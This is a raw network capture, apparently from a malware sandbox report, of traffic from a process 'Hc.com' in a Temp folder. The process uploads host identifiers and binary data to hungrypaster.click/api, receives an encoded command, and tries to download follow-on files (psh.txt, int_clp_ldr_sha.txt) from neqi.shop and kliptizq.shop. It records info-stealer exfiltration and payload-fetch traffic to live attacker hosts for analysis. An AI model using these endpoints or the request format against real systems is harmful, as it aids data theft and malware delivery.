                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwZuARzY2sgoL0%2BG5W2tvT2iSdKb6INjwuo1pyTJLPKC1zGcanauUeDPqL0Q5OvN%2BpUsGyTGKss3e9X%2BAUgb9lnuxxTOyY9SdUKn%2Bx%2F%2Bb3KXN77i7yGjPJ0yhmnhePJFlJvIw5c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80cb9ff643ee-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=600&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19118&delivery_rate=1810291&cwnd=230&unsent_bytes=0&cid=2b44129356448c47&ts=991&x=0"
                                                                                                                                                                      2024-12-24 00:34:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.449745188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:01 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=QYR7YRM38GD4I3YU5
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8776
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:34:01 UTC8776OUTData Raw: 2d 2d 51 59 52 37 59 52 4d 33 38 47 44 34 49 33 59 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 51 59 52 37 59 52 4d 33 38 47 44 34 49 33 59 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 59 52 37 59 52 4d 33 38 47 44 34 49 33 59 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 51
                                                                                                                                                                      Data Ascii: --QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="pid"2--QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="lid"hRjzG3--GAS--Q
                                                                                                                                                                      2024-12-24 00:34:02 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:02 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=49cq2kv859amrj8340e9pi910i; expires=Fri, 18 Apr 2025 18:20:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38WbVsZMoSnS81YXyBhbtiU6wMMpw8dMOeTlrvqvvxygdmsK7%2FIPYkrQFRxoespx9Tefux92cdjp1qRtWrxfHJsj%2Bm0zriW1pekGrU3m1RiC2wZF6kw6IEbMFSo19Pugzlfp9XM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80d9ee664301-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1569&rtt_var=625&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9716&delivery_rate=1702623&cwnd=166&unsent_bytes=0&cid=ebd0b6e40f14966a&ts=881&x=0"
                                                                                                                                                                      2024-12-24 00:34:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.449746188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:04 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=MFV3S0UO4HZA
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 20399
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:34:04 UTC15331OUTData Raw: 2d 2d 4d 46 56 33 53 30 55 4f 34 48 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 4d 46 56 33 53 30 55 4f 34 48 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 46 56 33 53 30 55 4f 34 48 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4d 46 56 33 53 30 55 4f 34 48 5a 41 0d 0a 43 6f
                                                                                                                                                                      Data Ascii: --MFV3S0UO4HZAContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--MFV3S0UO4HZAContent-Disposition: form-data; name="pid"3--MFV3S0UO4HZAContent-Disposition: form-data; name="lid"hRjzG3--GAS--MFV3S0UO4HZACo
                                                                                                                                                                      2024-12-24 00:34:04 UTC5068OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc
                                                                                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                      2024-12-24 00:34:05 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:04 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=qh4fcpln8n8hjj9gtqj0tvhlcr; expires=Fri, 18 Apr 2025 18:20:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5HD9PI%2FjHkunWzNZPxaz2m8BnICwkT7ggCFS90BckP18jcZFfM7UVvrjtY7haYPS6IHZ9NTkjx9ePJwUCscfIP0pDYLxDogll6k%2BHbXVvFbPXOjNFKgLjknwz44C5uAf%2BXJI0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80e8889141cf-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1706&rtt_var=646&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21357&delivery_rate=1684939&cwnd=169&unsent_bytes=0&cid=bf0de1171c4e2046&ts=982&x=0"
                                                                                                                                                                      2024-12-24 00:34:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.449747188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:06 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=BDDN9MUY
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 1193
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:34:06 UTC1193OUTData Raw: 2d 2d 42 44 44 4e 39 4d 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 42 44 44 4e 39 4d 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 44 44 4e 39 4d 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 42 44 44 4e 39 4d 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                                      Data Ascii: --BDDN9MUYContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--BDDN9MUYContent-Disposition: form-data; name="pid"1--BDDN9MUYContent-Disposition: form-data; name="lid"hRjzG3--GAS--BDDN9MUYContent-Dispositio
                                                                                                                                                                      2024-12-24 00:34:07 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:07 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=kk4ic4s1abpn8heoc1bvhg21ec; expires=Fri, 18 Apr 2025 18:20:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5lpJPoT3TI2CvWH4ggPgFIJ4hrxny01TKm%2FBcPyzaROQxSkK8blyqgr4ZrkMkxTExUK4ftsnElZAeyWQQW%2Falr0FDZrszHlpK%2FS%2FUiE55mn9HFTxCXOse0jLPleeov3b67pneQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80f71bf10f6b-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1520&rtt_var=586&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2102&delivery_rate=1843434&cwnd=210&unsent_bytes=0&cid=263be0049f94663c&ts=1059&x=0"
                                                                                                                                                                      2024-12-24 00:34:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.449748188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:08 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=IV5EB92934TXGICS6X
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 1123
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:34:08 UTC1123OUTData Raw: 2d 2d 49 56 35 45 42 39 32 39 33 34 54 58 47 49 43 53 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 49 56 35 45 42 39 32 39 33 34 54 58 47 49 43 53 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 56 35 45 42 39 32 39 33 34 54 58 47 49 43 53 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a
                                                                                                                                                                      Data Ascii: --IV5EB92934TXGICS6XContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--IV5EB92934TXGICS6XContent-Disposition: form-data; name="pid"1--IV5EB92934TXGICS6XContent-Disposition: form-data; name="lid"hRjzG3--GAS
                                                                                                                                                                      2024-12-24 00:34:09 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:09 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=2tsrs975rj5sujrftouooccd19; expires=Fri, 18 Apr 2025 18:20:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzoimJ4D4g6DudTcBG%2By3SZstAeUzbdzyiKzS4LS2KS7h4yQb7VUan7ikmwteYZXRbH8cgovaksf0aqa6%2BbD26arF%2BSn09wKiCWwrBQuobKfQfY2JTz%2FYJ94ZZw5ihuttxkQoTY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c810598f44325-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1607&rtt_var=608&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2042&delivery_rate=1790312&cwnd=180&unsent_bytes=0&cid=1a126ccf4d0976dc&ts=925&x=0"
                                                                                                                                                                      2024-12-24 00:34:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.449749188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:10 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 112
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:34:10 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=0E0DEDA448A18C67165F70E3262EAA47
                                                                                                                                                                      2024-12-24 00:34:11 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:11 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=r7d6ssiuo62ki35g1ni5ims08s; expires=Fri, 18 Apr 2025 18:20:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC84yjOe0uofg6JdR22bH0G9ApneNMxfonSSnoQ0wTUDw3CRK4PepKJfQ6tCK07oSnQpDxM7FOrSy%2Fiyg%2BxRwkQHeFcA0rn%2F0xJZcAicDZMNWWiOB42roXC%2BTwcF8UCVuE7Qb2c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c81136a7241fb-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1604&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1015&delivery_rate=1782661&cwnd=181&unsent_bytes=0&cid=d627a6cbdd5345f3&ts=799&x=0"
                                                                                                                                                                      2024-12-24 00:34:11 UTC218INData Raw: 64 34 0d 0a 54 65 47 31 5a 75 79 47 65 35 2b 4d 34 34 45 76 61 30 76 79 4a 61 78 4d 51 2f 34 4f 4c 31 6d 7a 64 6d 44 54 36 47 45 59 59 6b 6f 57 6d 70 63 54 7a 72 78 5a 39 2f 69 58 38 56 78 52 46 39 31 35 67 79 49 6d 6a 32 63 42 4b 74 73 5a 45 49 2f 48 45 6e 77 46 49 44 53 55 77 54 72 44 39 67 6a 33 6f 70 66 35 57 30 6c 6e 30 45 50 59 62 6e 6e 4d 49 67 30 38 6b 55 78 52 72 73 51 61 4f 68 64 6f 64 38 50 64 45 70 6a 32 43 4b 58 51 7a 4e 30 41 41 43 65 62 56 64 67 6c 4f 59 38 67 58 44 48 63 42 6a 7a 38 67 51 39 73 50 53 6b 68 6b 65 6f 4b 69 50 51 6b 37 4f 53 43 72 31 73 54 50 39 41 4a 6a 69 6f 33 33 44 51 64 64 5a 45 54 51 75 6e 5a 48 45 55 3d 0d 0a
                                                                                                                                                                      Data Ascii: d4TeG1ZuyGe5+M44Eva0vyJaxMQ/4OL1mzdmDT6GEYYkoWmpcTzrxZ9/iX8VxRF915gyImj2cBKtsZEI/HEnwFIDSUwTrD9gj3opf5W0ln0EPYbnnMIg08kUxRrsQaOhdod8PdEpj2CKXQzN0AACebVdglOY8gXDHcBjz8gQ9sPSkhkeoKiPQk7OSCr1sTP9AJjio33DQddZETQunZHEU=
                                                                                                                                                                      2024-12-24 00:34:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.449750172.67.169.2054437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:13 UTC199OUTGET /sdgjyut/psh.txt HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: neqi.shop
                                                                                                                                                                      2024-12-24 00:34:16 UTC947INHTTP/1.1 523
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:16 GMT
                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                      Content-Length: 15
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8pQIiCcZEC1SI0HluUphiZk5AAFWFpAJLq164%2Fr4K41zF9%2BKEO9sFmAKuo5vxGs2OySGsas%2BjkW3bDFMCu5wWNQiSFAtpVOCbIu%2BM%2FeVFYoUllZ4jTFk4ViqDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c812148718c17-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1792&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=813&delivery_rate=1586956&cwnd=240&unsent_bytes=0&cid=e0c1e540c2348bac&ts=3591&x=0"
                                                                                                                                                                      2024-12-24 00:34:16 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                                                                                                      Data Ascii: error code: 523


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      9192.168.2.449751104.21.84.1134437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:34:18 UTC207OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: kliptizq.shop
                                                                                                                                                                      2024-12-24 00:34:18 UTC554INHTTP/1.1 403 Forbidden
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
